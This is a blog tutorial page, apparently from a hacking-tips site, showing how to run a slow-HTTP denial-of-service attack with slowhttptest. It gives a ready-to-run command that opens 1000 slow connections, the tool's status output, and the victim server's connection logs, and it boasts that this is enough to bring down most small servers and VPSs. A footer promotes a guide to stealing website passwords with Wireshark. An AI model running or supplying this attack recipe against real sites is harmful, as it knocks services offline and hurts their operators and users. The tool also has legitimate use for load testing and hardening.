Home / Linux / Attack a website using slowhttptest from Linux and Mac

Attack a website using slowhttptest from Linux and Mac

From attackers end

So, I am collection stats and attacking www.localhost.com with 1000 connections.

root@kali:~# slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://www.localhost.com -x 10 -p 3

Test output from a real slowhttptest - blackMORE Ops -2


Tue Sep 23 11:22:57 2014:
    slowhttptest version 1.6
 - https://code.google.com/p/slowhttptest/ -
test type:                        SLOW BODY
number of connections:            1000
URL:                              http://www.localhost.com/
verb:                             FAKEVERB
Content-Length header value:      8192
follow up data max size:          22
interval between follow up data:  110 seconds
connections per seconds:          200
probe connection timeout:         3 seconds
test duration:                    240 seconds
using proxy:                      no proxy 

Tue Sep 23 11:22:57 2014:
slow HTTP test status on 85th second:

initializing:        0
pending:             23
connected:           133
error:               0
closed:              844
service available:   YES
^CTue Sep 23 11:22:58 2014:
Test ended on 86th second
Exit status: Cancelled by user
CSV report saved to my_body_stats.csv
HTML report saved to my_body_stats.html


From victim server end:

rootuser@localhost [/home]# pgrep httpd | wc -l

Total number of httpd connections jumped to 151 within 85 seconds. (I’ve got a fast Internet!)

And of course I want to see how what’s in my /var/log/messages

rootuser@someserver [/var/log]# tail -100 message | grep Firewall

Sep 23 11:43:39 someserver: IP (XX/Anonymous/1-2-3-4) found to have 504 connections

As you can see I managed to crank up 504 connections from a single IP in less than 85 seconds … This is more than enough to bring down a server (well most small servers and VPS’s for sure).

To make it worse, you can do it from Windows, Linux and even a Mac… I am starting to wonder whether you can do it using a jailbroken iphone6 Plus OTA (4gplus is FAST) … or a Galaxy Note 4.. I can do it using my old Galaxy Nexus (rooted) and of course good old Raspberry Pi …


Further reading and references

  1. Slowhttptest in Google
  2. How I knocked down 30 servers using slowhttptest
  3. Slow Read DoS attack explained
  4. Test results of popular HTTP servers
  5. How to protect against slow HTTP DoS attacks

The logo is from http://openclipart.org/detail/168031/.


  1. Thanks for sharing. I’ve never heard of slowhttptest before.
    I was using apache benchmark tool (ab) for performance testing.

    • Hi Flip,
      Pleasure. It was a random find in Googlecode and I liked the project for it’s potential. You can attack or use it as a benchmarking tool. (The way I see, they are both the same – just different user-intent).
      Yes, I’ve used ab too, but it wasn’t very flexible. Cheers,


Check Also

Hack website password using WireShark - darkMORE Ops -6

Hack website password using WireShark

Did you knew every time you fill in your username and password on a website ...